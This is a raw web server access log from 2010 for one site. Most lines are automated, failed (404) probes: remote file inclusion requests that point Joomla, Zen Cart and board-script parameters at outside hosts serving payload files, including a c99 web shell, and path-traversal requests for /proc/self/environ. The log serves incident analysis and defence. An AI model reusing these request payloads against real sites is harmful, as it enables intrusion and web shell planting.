85.93.128.40 - - [27/Jul/2010:04:55:49 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:55:52 -0700] "GET /logs/access.log%20%20//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:55:52 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:55:52 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:57:05 -0700] "GET /logs/access_100614.log%20%20//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:04:57:15 -0700] "GET /logs/access_100614.log%20%20//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.70.7.48 - - [27/Jul/2010:04:58:07 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
193.138.125.55 - - [27/Jul/2010:04:58:27 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute.path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
212.241.251.207 - - [27/Jul/2010:05:00:58 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=szss.com/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
212.241.251.207 - - [27/Jul/2010:05:00:59 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=szss.com/data/id.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
207.46.199.191 - - [27/Jul/2010:05:04:25 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:06:17 -0700] "GET /logs/access_100614.log//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:06:18 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:06:18 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:07:01 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:07:01 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:07:01 -0700] "GET /logs/access.log%20%20//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:07:02 -0700] "GET /logs/access.log%20%20//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:07:02 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:07:02 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:07:08 -0700] "GET /logs/access.log//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:07:08 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:07:08 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:07:10 -0700] "GET /logs/access.log//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:07:10 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:07:10 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:07:28 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:07:28 -0700] "GET /logs/access_100614.log//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:07:28 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:07:44 -0700] "GET /logs/access_100614.log//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:07:58 -0700] "GET /logs/access_100614.log//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.70.7.48 - - [27/Jul/2010:05:09:15 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
76.70.7.48 - - [27/Jul/2010:05:09:15 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
76.70.7.48 - - [27/Jul/2010:05:09:15 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:12:10 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:12:10 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:12:10 -0700] "GET /logs/access.log%20%20//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.70.7.48 - - [27/Jul/2010:05:12:14 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
76.70.7.48 - - [27/Jul/2010:05:12:14 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
76.70.7.48 - - [27/Jul/2010:05:12:14 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:12:17 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:12:17 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:12:17 -0700] "GET /logs/access.log//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:12:18 -0700] "GET /logs/access.log//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:12:18 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:12:18 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:12:22 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:12:22 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:12:22 -0700] "GET /logs/access.log%20%20//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:17:56 -0700] "GET /logs/access.log//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:17:56 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:17:56 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:18:38 -0700] "GET /logs/access.log%20%20//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:18:38 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:18:38 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:18:39 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:18:39 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:18:39 -0700] "GET /logs/access.log//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:18:43 -0700] "GET /logs//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:18:43 -0700] "GET /logs/access.log%20%20//index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
85.93.128.40 - - [27/Jul/2010:05:18:43 -0700] "GET /index.php?option=com_lmo&mosConfig.absolute.path=http://valdes.fileave.com/scan/kil-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
67.218.116.168 - - [27/Jul/2010:05:20:33 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "www.redneckmba.com"
95.60.44.232 - - [27/Jul/2010:05:20:45 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.saldiri.org/c99.txt?? HTTP/1.1" 404 - "-" "Python-urllib/2.6" "www.redneckmba.com"
64.15.156.75 - - [27/Jul/2010:05:28:39 -0700] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
64.15.156.75 - - [27/Jul/2010:05:28:39 -0700] "GET /logs/access.log%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
64.15.156.75 - - [27/Jul/2010:05:28:39 -0700] "GET /components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.106 - - [27/Jul/2010:05:29:35 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
222.236.47.182 - - [27/Jul/2010:05:31:14 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
222.236.47.182 - - [27/Jul/2010:05:31:17 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.194 - - [27/Jul/2010:05:31:21 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
222.236.47.182 - - [27/Jul/2010:05:31:31 -0700] "GET /logs/access.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
84.217.73.155 - - [27/Jul/2010:05:31:51 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
84.217.73.155 - - [27/Jul/2010:05:31:52 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
84.217.73.155 - - [27/Jul/2010:05:31:52 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
84.217.73.155 - - [27/Jul/2010:05:31:53 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
66.163.171.205 - - [27/Jul/2010:05:32:13 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
217.65.2.151 - - [27/Jul/2010:05:33:11 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.redneckmba.com"
84.217.73.155 - - [27/Jul/2010:05:33:16 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:18 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:18 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:18 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:19 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:19 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:19 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:19 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:19 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:19 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:19 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:19 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:19 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:19 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:20 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:20 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:20 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:20 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:20 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:20 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:21 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:23 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:23 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:24 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:24 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:37 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:37 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:37 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:38 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:46 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:46 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:47 -0700] "GET /logs/skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
212.52.166.12 - - [27/Jul/2010:05:34:47 -0700] "GET /skin/ggambo7002_board/comment_modify.php?dir=http://www.ulster.irishhome.net/archive/idx2.txt? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
64.15.156.75 - - [27/Jul/2010:05:37:05 -0700] "GET /logs/access.log//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
